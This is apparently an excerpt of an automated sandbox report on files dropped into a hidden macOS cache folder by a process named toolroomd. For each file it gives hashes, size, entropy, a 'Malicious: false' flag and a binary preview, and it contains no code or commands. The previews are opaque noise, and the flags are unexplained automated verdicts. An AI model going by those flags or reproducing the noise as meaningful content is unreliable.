SSDEEP:	384:JoitY5b6DTR2kX6Mo7o/IIH6KSKCHHquXJ/Y:GB5baTRRqMo7oxH5sHKu5/Y
MD5:	07820FC06272193A1ECA696421061333
SHA1:	445355AABCB49829D8DC5EE574A6DFA467EB78FF
SHA-256:	2741A1260791BD99FDB7612425543E559FF4F9E82AA55E5E5836CCCA62D1EF1F
SHA-512:	8F238B562D9416BA3E839C6E92A2170E67D460909498BBD00C28D051C470C0B97B64A94D69DD15EC16CD81FB31FFEC4BF0C1DCFBC4CAE6E7D0245CD1C073DC17
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:............\...m..........j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{......q.".Q..i.G.....5Q...z...f3kc.#A.\|t.2..........,.....c.;....^...-.S..$w<.....].."....1...:..+.....v..O......w&...u#..,.1s....\...#...B...1..\|.b.P.....^..p...r%......yb..%=..Mb..{..6..G."...=.B..z.R.6..M..2...x.C.Rf~A>].{K...!jqHz...g-..Zh......$.z....dh...<..!.QM..9.@.1.*..jX..Pm.E......E.kc.#A.\|t.....S!......,.....c.;.....L.I..bC{..+Hz...g-..)...W....$.z....dhO]..S.H4QM..9.@.........Z<.3....b...6=...X. .C.d..V.!^..W .=....`..y[b.<{.?`.A)/.d6.. &..j.I=...m..'V.{..]..J.#.\...6<.."a.....q.A"&...q.A"&...q.A"&N..<.i..V........KvC..\.D.........=.$k...q.A"&...q.A"&...q.A"&.V.#.S..t...Z.)Q..Lu.8.,u.e.].Kl..KvC..\.L[=.Z./.{.P5{.F...q.A"&..Hc."..,.j....MI5..i....q.A"&6<.."a.....q.A"&...q.A"&...q.A"&.....j..,.j....MI5..i....q.A"&6<.."a.....q.A"&...q.A"&...q.A"&h...bp..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.62A85DC9-5FB4-46EE-AC7A-0B5083520C6D.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	49380
Entropy (8bit):	7.972741106663911
Encrypted:	false
SSDEEP:	1536:lKZpkquw7foQdipTpjCJJxutLubHBQAio1Tb5mQNeS4fb3qtAAd:lKZpNuw7w+6MTqubHqAiYxmQNafb3q2k
MD5:	D8FF6E7569EBA0056EDAAFBB68CF700E
SHA1:	39910952661C05FAFFC1902D639A2DCF4B0EC20C
SHA-256:	0EB0B70E37420619837EEC6A1F176D42409C3A5944A1F916D1EA950AD930DF6E
SHA-512:	BC580954275782E366EC4E97F573CC9EEF28D1FFB347750066372051C57B7E850C3020660A4BE12FF2B8B6311EE2A792811C1CC5EB455B11C55B797088692155
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W..kXv.&..A....V....../=.h5}X.+P..vb=.3......!......m..MD....c..LV")..BW.zc......kf..^.,.{.."...Nx.1.!pFq.VL....y..... G.k..XqRL"R.Q......}`.._..Yi.NDG..^1W'...gGpa.(.mr....@..6..O...G.+....m...i...@......:....s.R.e...0;sN-.p\+......L...!^.O%..@.Y.h..z..y._Sw.]...$..-..g............l..g..{..@.......g<..i.6z.R.&..3..?/..O.W...7........?..m...L.....[.YoJ.i..d...R.jW..y.k.$...b....zx~..'.E..j.#l...!D.D..F..e..oT..\|.<........m.lo.e.5..i..,^............(v....=.U.9...y.(8b.Q......J..R.)..e.........8.h..@.0.../.'.............{c..RU*^u...G.oU.F.w.n{..X.'. ...[...d.nd.<..+C.0.l....dXH.7.\.7..G.C..%O.>.........K..<.l..._..i..._.f$.n.S..q/M".W..c.N../.3.y.').'..\..E.z.....#.......U."E.q..S...}.0...S....np..C.J{i...~.PH`.T.e....'..BK.q.g..+.2..V.i>3...6hx+..Z ........[=.....@L".\|Z^=....\.S`.=k2..{.W..Z.g...>.H..1&F....<...d..[.X...=b.ks....e.j.}..y..v.....j.=..q".&[.s.rJ;n....m...}l..U.J.9...Yol)Or..k.$Q.....c.!._;>..Vt....J

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.75F55D06-2316-418C-ACA9-FEF330169885.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	5354
Entropy (8bit):	7.896506753615759
Encrypted:	false
SSDEEP:	96:2vBUDkqnrYpXE6r1XuTSENiPyNyGbKhMtit3MCm0oPIldm0s6S44u:YqEpHiEKlMdmPF0R
MD5:	1B9F64DDBEF737329E5270DD8EF6D24B
SHA1:	96D9BF09EA85A20C91E3D5FEF10E1AB03734D3FF
SHA-256:	6481AF66FE89E7AE2C913103F18DA9F9FCEC9E21E07A79D65EC7EAB587AA0E9D
SHA-512:	BE594B0A3E9D854630E22BBA03ADC7B0626B9FE3659BF849C68A8E267857B65F3206A88139DE6BBAF103778C277248F96CDDC379161598F7A032A33AB945BCBF
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W.............T..K.k..'..S..\|..0..U..........!......m.../b..J.....DL.R..MW/o.7Z...A.0..s....F.2..[.J.M...8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#......Z...,I:...!....s.7T1\?vc.#Y..$...1K....[d....'j.,......DsG.6.v-..R..0..K...F.Z..i..G..h.'.H<.........5..d.KJue.oJ.;.n.(.~4 jK...F....b(6..;p>...-...:R.(.....c.A....1........E.{...h..5...J.w..5.46..Y.....[6.....Y.Q..:..../.Ev.=...@}..K.Z..l.....&../R.H....................h..Mu....5I..9iT...U.W'..."....$..}..77.#....y....[`.....L.'E]..~..v-...y5.J.:d..z.GA)ZQ{.. ...Bv.J.......G.oU..1..`AwC.B ...V..h.{..@nwA.x_4..7...GX.S...yAD..>$.{..+M..0%.2QC?n+F....O6...FA.c.\..k.gx.`?...=..[.;#..._..........Cn.........A_....A._lY.Qn.T.s.k.R/.R.="N..91A.......D.....~'.=Q.....v..x0EU.C..t.$C<..mL\.....L.^....nw..r..-.R...8.5c.d.^...H...........o.........(.....r..s....Q..*8.2K.G~. Jdz.@...z.V..........5]]...'....j%..5.$.z.P%.ol)Or..k8....W...i.OCo%.......kU...Xf-~

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.7B8B6527-E826-4D80-B1FD-A9007A583230.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	6.889601228224717
Encrypted:	false
SSDEEP:	192:Jo2iigZZ2Qiu4kUCj87tWbvR4LwvfyrmXTuigsv2Pdt:Jo2iirQitE87ovR4sHyrS0EYdt
MD5:	41C70E109B1F5CDC9852D7FE3951773C
SHA1:	9F8DCB99D3BBA5E6452544212E488593E6EA0109
SHA-256:	5F85B7B5ADA579EB61979AC3E1B88BA1F25BAA8307A9976592A4054B024E6286
SHA-512:	6AC1987A8591E778C7FD7391949352CC8678A8BB59FF51DC13E6E02C8E0D4C2D4E123A70C4F70B90DBC1B9D6855D4921AD74312D9696971E91C5361E916ABAFC
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\U....3..eFb..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{..;.S...E]oQ.....u....2....M....e....:8.%...YKs.......)A......AF.Cy...U.L..cK...;..+Mj.wFpHXT.Y.k.....#,..sH..!2G......kb.7...q.A"&...q.A"&0u.5.a.#...7.z?jM@$.[.#../...v.;J.B.:...q.A"&...q.A"&...q.A"&.l.f".'.K.W..K..C.%...o1..!........\7....rW....v.]45...q.A"&3...S...6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&%n..Yf.6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&.<...i..6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&..`.YS.h6<.."a........F...q.A"&..Bo.R.....kb.7...q.A"&...q.A"&..I.L.....kb.7...q.A"&...q.A"&+.Z.#Cb.6<.."a........F...q.A"&. .^...s...q.A"&...q.A"&...q.A"&...........kb.7...q.A"&...q.A"&.<...i..2.A..bT.......F...q.A"&..`.YS.h2.A..bT.......F...q.A"&..I.L..0<-.f....2gPB<....p....P.k.....PQ.....'.rhQ\....W..f.r.,.b.(..oN....0,...)p.......q.A"&

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.81986435-AFA2-44FA-AB34-8B0BCDF8D374.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21315
Entropy (8bit):	7.958840355365837
Encrypted:	false
SSDEEP:	384:ZORJh5X2JsppSwXTvXyL4xDS27WigFP4E+VlsQjjfMS3y1:ZORJh5X22pSOTvXS4xe27bgFP4E+VqQI
MD5:	E8BA2A0EC7F494B83F49EAF5C7AAB3D8
SHA1:	A8C2BEC655517326A7B2B2ED08F37206F2788B00
SHA-256:	6D0055138AC5EC35194D1A5EC19414A359C6E8AFB7A669951A95EB397BE2FF42
SHA-512:	A909EE8669101C657E687A3927B5FE61C8DDC09903E6791667C860C27C361A3A463AAA878398B61D47167C92D3F9736637AE90D7B84E26B023D463DCC3C97E47
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W.J........R..a..;...QT E...m......QCY.)......!......m[..g..'H..IC...R..MW/o.7Z...A.0..s....F.2..[....AF\|A.8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#...X...M......B.b4q.t..).X.$d..$d.2.k.q....#...G...[.m.?Dt.....@....SUl.p"xVg.'F...i..G..h.'.H<...............}.B1RF..hn.(.~4 jK...F...e..._...I.<_....:R.(.....c.A....;e...../t}~.k E.X.g.thJ.w..5.46..Y.....[6....7u......".`"e!..). .q..Z.K.Z..l.....&../R.H....................h..Mu....5I..9iT...`...Kmg..#..`..}..77.#.....\|.u...].;_.L.'E]..~..v-..$.O>...8$....G.2...P...}.V..J0..s....F.2..[.r.......[..g..'H.0.....~?H..1.mJvT...'..=.{0..I.<....1..#..K.<I ...d.-[..[..N........S_#....I.\T5nC.......@j.-.b.#..^+[g...I.....f...X.5.m..x....j.#l....:..a`b...../.V.....i..t...y...U.^.i..bC......EP.Xa)u.}>..W.+.V...j.X.2q.-..J...X)y...f..gbC.Et..rr.E.&..yMG...Q.K...."....h?.J..bK..F5..5..n.qE....Uj......GN""-P...8..uhol)Or..k.O. M...i.OCo%.......kU.Y..+=#.. .9sJ.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.8C92B4B1-CC7C-4F15-A66E-BCFDB534A2FC.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	31659
Entropy (8bit):	7.533077061888828
Encrypted:	false
SSDEEP:	768:Gr7zJdIHqxkAHNPpUd2tlwuP4RxFZSck4JVPt7t:GrXJSWHNaQdP4RxFZScVrh
MD5:	88AD20E8DFF00E07D163C4BF001DA637
SHA1:	E25173634BE8C2B6CDCBB56F84AE161FED1A0E7E
SHA-256:	75565259C34F73927C757AAF46B55FF2EA229B93F62B43C3672DEEED714243FA
SHA-512:	97C4932C0BC91C6BDC685FBA45E110A1AE52C20738066A9892125DBD08E4B98461607A3D8A3C9B44C5B5D708E8E22D78B346FD03CC9FD5132BCA0D8F920B3692
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,.qH..._....9...=5.+..\.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.)9o.....,.C.".3wD.F5....y.MO!4...V.:.....h...#.....v..O.......sq5......[......'....t..~4/kc.#A.\|t.....S!......,.....c.;...[.pL..F.2..16.#.."......=/.a./.....2..A.@!,....{.6,..s(..Z....eF..d..-.~....3./....m.Z.{..p..,9.n..Dr..M..{....h..0.%..r.W2.B.....p8....:...:w.....ilBI..>s.{...u..N4.a..(..^[..(..b.....a6f...;.o...`....s....G.z....dh...<..!.x.X....sCP.I.T..7..e.......<...~'.A.....r.~R.6..M..2...x.C.R..eS...l...4.yj..z?J.(...h.-.. 1..pUtf* Z...P?.P.....^..p...r%....U...9u.<.Fz..D.F5....3.\|..yk;4.=P...V...h...#.....v..O......I.=7...\|).......'...Rv..,..kc.#A.\|t.....S!......,.....c.;..t.........T......./9.{...H. ......*,....j.k..Y3."...s]...<_.EM ...q......:y..'0.4.........~...."..z.M4..g3SX.!.`...q.A"&...q.A"&/.<.8.....D.]....h'...vM..j..<.V.J...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.8FDA5919-56D2-4E8B-ACEB-0865B79DB3F3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16330
Entropy (8bit):	7.9603535235353675
Encrypted:	false
SSDEEP:	384:z8mGVmWytiMqmdazOQLf6BeBTemKfI5wD1W7mwI1mcmXX5pKmPaW:zRGVmWyiMXdu3yBeBTDKiu1WywIcxH55
MD5:	539A0CFDB84FC37207B308A800E8A62E
SHA1:	4D1D1AC99A5DF6CD36F51BCF5BD5CFA520A2DB6B
SHA-256:	475DC9C0FA8F83A94C066C69B85D80648B891168AF19C8904DC5A625E2EECC84
SHA-512:	12890F8ED4A318AC1D0A8FB306D55DD685706F655F7D616A8D03C11DF5F303D4CEFAE70708BC96AF6953262E95406E59BE510EB43997E8BCE3CCA6370B66FBF0
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W)....J<c...x.i.....k......2................!......m.....JC~h!.a.X.fG....{._.zi.Y...........eb.~[....(x;1.!pFq.VL....y..... G.k..XqRL"R.Q......}`.._..Yi.NDG..^1W'...gG..ce.F..._.."1....&n..".L....^@...#.."..w...........8..x.$p..yUX7..v.E..k..&q....9..P;.LY..z..y._Sw.]...$.]...x#..+..Z-`.8iK...J..........g<..Lk!..2 .F...zq.......)R...A...K.....\|...8..........e..8.-....n...Hm~...;.._....k..T.J..P..L.Zb^....@.3.F.!.G....)........ .E.6g.....U./^9.,..Q.l...z.]..V.>....M\|...&..}.}Q.t..i.B.0N....o..................8.h..@'#^...{[..5......d.v....lD>o.e.M.V....\.Ir04;...^0pr.g..9..a.".]....6.#n...-...;.1s...}.-.{.j...%I...e...9ee..2S.......'.P=.[..H.~.11.s.S.!....3....._\.[n..e..]..:U}...Q..T.(5....A`2UvK.T...... .>.8.v.....VB..........LF'.}6W..._9.W..Py..W.8.'.0..F.9.^....T.)..x.`#.:R.(.....c.A...6......}...8.xpUM.. ..(^.S....6..Y.....[6......7xz\.A...`.rV.............'..s.R./uE.D..)U../e.}../..i.}..}.X.......Y....uQS.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.9008F788-1CD3-4DF1-BA8B-EEC06944CF99.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16122
Entropy (8bit):	7.949618016811063
Encrypted:	false
SSDEEP:	384:evEci00zI4tSJfXId7M5iYA4qOj4sC42BMa4Vdd8YLy4sor:rcL0c4tSJQq5iYA32W6rVddpLyur
MD5:	D46B942D475264D47A50CF3D4AF77DB8
SHA1:	29FD4192A451A8326E1C293AA9B7F99CA355A888
SHA-256:	B91441F142C48D4595FB4030EB5E4BCBC41EC09F37C86C2125844FD6FF344027
SHA-512:	1EFA7ABD4F70B26007A9448D7C5BE90426F9C8B801FB494B6D91F502349E98ACC30D2219F6A79CAD0381D3005007BDDC8474DA794B1A7A73C9F5895EDB017872
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W..T...X...LW..f....z..m.\...lp..L..Y........!......m..4.d....3..K.....7.QR.4g....[...1J.JgB....../.....e^T..$.8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#.%..Y.Z3.B.'.$.v.,.].8qL.fq.dRG......j....<....+\|v3..$$...k=.I.i./].n.^4..\|...4..5...i..G..h.'.H<.>3...6hxae...../.....:[p}rSx...K...F....k...^.!P....._...!.U.......)R....i..tD.\|E.~<tp...w.....cA0=..c.\..Hm~...;.._...u..~....~.P..l.K......D...I.....)........ .E.6g.....U./^9.,..Q.l.o...;.<.K(!...R\|...&..p...(x...i.B.0Nz...w_..LEP.N.........8.h..@..%.V.........E..d.v....lD>o.e.M.V....\.Ir04;........X...9..a..8.\|...W0.?..\|.awb...C.+M..0%..Rp.&.+.#.LK.K8..u.?...'=.j..+...x.\|u...r.........)..R.,w.B.....ABUK./..O.W.2...b.x.....eU...[..m.d..g.3.B.i..d...R.jW...I....B.oVi...Ai/~...j.#l......)..g...M......Z....AHq...R....w.....<..G..q........>.... ....M.....gU`...oF../...'s\hd.y........{/.w...NJl..a...L..q:0.X....L~.i.OCo%.......kU

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.91F275E7-30A1-4649-B5AB-BF339215FD54.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	9098
Entropy (8bit):	7.927299891150223
Encrypted:	false
SSDEEP:	192:yrR7nTkuSKWd3LXJAaZ4rbG/mSDIsZQ8k+EtRlkxGDx3QqlsM:qTbSK6LXJAYE8mSDIqQ8sjCo3QqV
MD5:	F6D11318C540A4571AA7BAC9EDEDF894
SHA1:	552EC553A4055EBEDDEE7D5C8F5EAFE2F52C1D4E
SHA-256:	5A1F856729D960D550571F2439B3E2CDCE7A7D5DCE2E2D7170908A9ECA94B0FD
SHA-512:	5C116E8F5ED9C24DF170C2E74DE259412A77055BE61222E91298444F00686F29D9EEB6A29A11995A3FB5AC475B736DBB64083DAF24C8379DC3252499A2C8841B
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W.".\|.........4.K..h....z....."/..6<.......!......m..MD......b...._.zi.Y...........eb.~[...GPx:.4.......+.......F.w.n{..G.c..j>.'v.}..a\dn..!..grR.R.......mzz.e.F.^.dm.x.7/.O...b(:..L...Yt8`%8.:...U9.......9g.`.....;......;q...........u...W..0.U`7cb,....1.2.!.Fg.....S[+.9.m8q....x..T.."-._....'1c...P...aWu$./.V...D.....A_......,......m....(a.W...^..<..xo......D.....~'.=Q.....v..x0EU.}_K.)....>Bzd..m..h..}~..l,:@..!./.......&4./....'...~..tI..?.B.J..&6b.R..j.9\.-.......g..8.h..@....Du.K.\|...)..)._..Rq...j..0..#...........>Mb...wY.k..Q.w.Z0..s....F.2..[...j.,qE.Z..T.76.i.qhD..k..&j...<..^=...U.9...4j.#y6......%...y...0..JIEC.!S...>g...,.?..n_.....G$.+..$.6j.4s...v.+...KA..sP-.7.b..n. .0...j...j."...D...I.T.vwp.D..9.0a&P!.../..L.z....sL.......d..g.3.BLW....X.i.G.V#9G....v-:X8.+.).....jwH..3W..[G.oTHM...S.......3$`\|.g.SQ.......^...CS.....%..Vy`.9.l.VJ.....,......~........1mi{......T.>X.a`{.h..../...w./.y.7....W.l.4$..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.92C0CE04-E406-4663-BD2A-D9E39189DBBA.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10946
Entropy (8bit):	7.9483775934265335
Encrypted:	false
SSDEEP:	192:F84ul+iJ40/Ty2W/Z7fQzsFremcw0kznVikqINoZxO/w37RWRqcwwWtH88dkaLF:1ul+iJ4iTyTZ7IoZNtjlzNo8w7RWRITx
MD5:	7957694605576484EDEE32A435D5169E
SHA1:	606BDB319E6AC940AC3CE18552539AA553F105FF
SHA-256:	52D89E7A787EC8048CA05821D9D33A425D58A1B2C85D050520A4DBB9D7A1EE4F
SHA-512:	53BF0B2827625E3F8874702A3BA2774CDAB17EEED66968A1497283E03709C9CE32705F8F9D217AE9E01473E41965D9C79386A3E13B385397DBBCFA391B0F0C3A
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..WA..<...W...?....-.? V..RM.l.h...zt0........!......m2w....#..H......S.^..9..........Q&......._=.1.!pFq.VL....y..... G.k..XqRL"R.Q......}`.._..Yi.NDG..^1W'...gG..0.=...^.>..2...k...n^..<.}xg...I..R...Sh4AG..?\|..5r.t5...\.~6...=..cp..f8n......bY).i..z..y._Sw.]...$.5................>Bzd...Jf./......g<........c..:R.(.....c.A....1......v.$[C..\.W,T.e.mJ.w..5.46..Y.....[6.....Y.Q..:..../.Ev.?...._..K.Z..l.....&../R.H....................h..Mu....5I..9iT...U.W'..."....$..}..77.#.I7.v".mb.u..m.rw.L.'E]..~..v-..`...3INg!.b!(...\i..n8....z.....S/..}D..^.,.{.E{.l......9..a....s.~l....O..+M..0%.n....,a....H.>..K<.(.....?ts...G.e....b./.`.d.8^.c...,w.B.....ABUK./..O.W..r.........tu.....Y.d..g.3.B.i..d...R.jW.].Ut$4..}.......%8Ur.R;.j.#l....!.cR..D...M......Z....AHq...R..>....p...<..G..q........>.... ....*C....W......U6.x.3...d..~1~.X^...Q.m\..NH....O...a....Q..^./".0'Q......S:...DWg...vb.% L....y.....j....8[.y@..W

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.9740087F-7EBF-4EB7-8963-FFF64013EA5A.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	43612
Entropy (8bit):	7.755343802045572
Encrypted:	false
SSDEEP:	768:Gc2tluoiW/f015VzzSOX8SJQqECQpxeRR2z/nVwW/:Gc2twYf015NMSExsR2VwW/
MD5:	A8269657B6B1384699FC55DCD23A377A
SHA1:	8F694ED3A4F984373ED9D54480006F32EEFCF490
SHA-256:	283055E95BB89BEE7E1A89CA2D69218A1F0CE6FDF74F163783163D83B36109A6
SHA-512:	DE490DB000CDB6C12AE19C5FE879D44BDF413559594F84E9BDA9D36085C9A6E0B43B56CA1EA97B9ABBDD6BDECB120717CA7148EDE0A27876E9986E75773BE0DB
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.....M?Q.\|L.s.qm..A.9..j.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.2.H....\|..4..\|....=.... .W.J.s.....dCD...h...#.....v..O.....]......1..B.\|.`.9M9..}..E=1k...kc.#A.\|t.....S!......,.....c.;.^.?Z.x.i.x..?..Xx.)}........5x./.a./.....2..A.@!,....{...i....+ER.z..s.......8.....t.@..P..{..p..,9.n..Dr..M..{..be....n......... ....dw...hW.....B.....ilBI..>s.{...u..N4..`....f..G.kX.............lW......._...s....G.z....dh...<..!.....e.....?....[.8\|V`..FU.R.vQ2uy.sX..>...r.~R.6..M..2...x.C.R..{6.j_E.....E.N..g..Uf....H...rF .4.0 Z...P?.P.....^..p...r%....S4...............=.........`ZG.....M...h...#.....v..O......7....3!3.........>.\\8\|R.6.L.kc.#A.\|t.....S!......,.....c.;....+...m.^v.}.7.ZA.gq...5u=./.a./.....2..A.@!,....{...i...F.w.,.-.85...2.k..i.q^E..]:...U.{..p..,9.n..Dr..M..{..be......".JU..i.mP9....)~.9.O...5......ilBI..>s.{..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.9D48E99D-B821-4ACC-A13C-FD947239DDFA.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	14818
Entropy (8bit):	7.955824214186722
Encrypted:	false
SSDEEP:	384:1IdcaGZVY2w99aD43xWDbJKQgJe7thZ+7:1Iia2af99ac3oD1UUxhA7
MD5:	E77AADEEDE96AC091210E18861FC5FDA
SHA1:	9690A84CD42BE4446D247E9426F59F0E2F90A6D3
SHA-256:	E437FB32BE3988830ECDB0937F52325894E442F16420111DBF04D512F4C8E026
SHA-512:	31F3635EBB90220374F763B7BB3A42A4ABC08D1DE42AB0AD24F2DCA36CE72D9C7F5539811534BDBAF86A38058E9E8192231863DF610BC92E39C638BE2B03A4FE
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W....e...'....X.O.8.(..u....9.....R&.[z.......!......m[..g..'H.#1..-.4Y...<h=.4g....[...1J.JgB....../......9...m.W..Q.= =..Ir04;..4.b.<....x..xHq...R..,.....idD...>.=...q."..4%...?....?/..v...c....B..J@\|.:p.,.....=.N&...0.6..h....w..j..V.T.P%....I..`...X...n.%..5W....\.T.D\|...jbA..@uc:..C.?.z...[.YoJ..S/..}D..i..0..%Y.4.5..nf8.:.K.....A_....A._lY....T..=..l.......%=........$.-.....~'.=Q....h.j....R.w..j....l..g...g....4~..l,:@..!./.......&4./....'...~..t..8P..\|........E..j.9\.-..;......8.h..@'0.e#z+.......`()..)._..Rq...j...m..O..G7.1..L#.Mb...wY.}.V..J0..s....F.2..[...n...[..g..'H1o.....>Y`..A}.... Z&o....=.{0..I.<....)._9KQbJ.a.c.:.{D.....x.O....d..h..K....@.....+.N/..@..YvJ......)Ro.pL.W....3..=#..V..._:.i.%.../.-....n...Hm~...;.._...9...!..../..TJ..G.%........^5.K.p..9.}g..='.f[.8..t!+.PLh9..(...s.O T.F....k.....^.!p.w]..,.(...v........58!.w1..R.-HA...qb..E#.1o.....>.....p .. Z&o..).yW.....{..P.4.T;.bA.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A0AEA798-0C7D-484D-9903-0F5E8BBCD985.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	29179
Entropy (8bit):	7.564939949286306
Encrypted:	false
SSDEEP:	768:GEa4oGpfFN+VTxEzhbW2vsuEKLBPNxn8b:Gio2fFNeEzh/suEK1PYb
MD5:	B506C2C0F477FD8B1F69FFEAD3DA28EF
SHA1:	13701CB0F1C7149BEB8BC296BFE36DC1730B656B
SHA-256:	9F99B2C3BCA9C45EE67EB1DEE6DCC6FF1F26747696B76A8361DC67466BFA23A5
SHA-512:	F58C236A47A1513036E0568F950B711EFBE2924DEC9507F0A2BF946A056C6776F3AD28AA85D7503CB634C2C8DE4380DFDF7782AF233090E9EA90632C0821398A
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..........S..3,.=..o..~n....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.<q.....F. i...hb;3......$..^kc.#A.\|t.2..........,.....c.;..U..8...u;.'..P.`.$6/8.$.- ..s....G.z....dh...<..!.u5>....>>....\|.L..c.)$i...\.;.{..p..,9]Y.z.r...M..{..x..m...U...D_J....\|-.8.....\| .kc.#A.\|t.....S!......,.....c.;..2...r..m.y.......V/...s.Zq......$.z....dh...<..!.u5>....>..i&\.6...{{..G.O.....1 .>.r...96..M..2...x.C.R.%..P.@.....}.:..S..3,....q.l...1..\|.b.P.....^...6.C(.(wa.;.<.h.^.)-..G.!A.S.9.H\|.xv.......TJ.k.S...1..^..#......8D_..........g....).}...K.w..(...g.&;.rW\|8>;...2....q.A"&...q.A"&..O.)y........F...D....n'..^p......y..{.P5{.F...q.A"&...q.A"&...\T....lZ..h...O.b2......y...!Z....n'..^p.B..x.&....q.A"&..O.)y.xl.j.\|...m..9.n.....K..O.)y.;...2....q.A"&...q.A"&..O.)y.J..L.y....m..9.n.....K..O.)y.;...2....q.A"&...q.A"&..O.)y...d.+:.G

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A30EF25D-E1C0-4B34-AC71-A8221A71B939.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	26147
Entropy (8bit):	7.503199311480304
Encrypted:	false
SSDEEP:	768:GS7ApgaPKQhn6wxFrJCFXI67xt57uZHIU:GSlaPP6wlCFYGt57yoU
MD5:	C8FFCD3C74C674AD4E0B9978A3A39E8D
SHA1:	1D9864DA7B596711419F9A94FC32A7CF1161A379
SHA-256:	B7787C9196456565F977D561B277F6C69D35475121CB3E626078F9F6083FC72A
SHA-512:	922E08AF47F59998EE87DEEBF8817749CAB74AECB75C59491A02795F04DDAA5F227FAA2C2508DE4444AF9C1F4ACD748701117BD28E6D6A96A049C07882AE77B3
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:......}H..J .P.....&...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.....=.?....\|.x..wW....(... .G.....M...h...#.....v..O.....th!...I.]...VB...ru......`.r.Hkc.#A.\|t.....S!......,.....c.;.#=.<..\'...n.iqvr....9m.Y.n.B.vI/.a./.....2..A.@!,....{.Oa+.U.X...D,P..%..[..G.B.T.d..\|...x\|{.'{{..p..,9.n..Dr..M..{..E.R~.....a....(.......z%....r^..-I3.....ilBI..>s.{...u..N4X..z.-.)..... FS.?tF...Z./(X.L.+.U..O.6..s....G.z....dh...<..!.....W@............./}......_\.&..Q.~....r.~R.6..M..2...x.C.R&\..&.FFTV.;..,.q..w,..U...<X....I..n Z...P?.P.....^..p...r%.4...>..D.<U{0l.u....2....M....e....:8.%...YKs.......)A............,z......."....h..0.H.....q....#,..sH..!2G......kb.7...q.A"&...q.A"&0u.5.a.#...7.z?jM@$.[.#../...v.;J.B.:...q.A"&...q.A"&...q.A"&.l.f".'....t......C.%...o1..!........\7....rW....v.]45...q.A"&3...S...6<.."a......*..F...q.A"&

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A45A8B18-E93B-4819-9298-00E0843F082E.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	12626
Entropy (8bit):	7.945905871043899
Encrypted:	false
SSDEEP:	384:9xKxrqd6rlr6LYmqV0MJaLpuSMZtlxMxK1tnwbzdt6xYHUsZt2Sb:fKxrqd65rMHMGj6GxCIdt6xY0sZM+
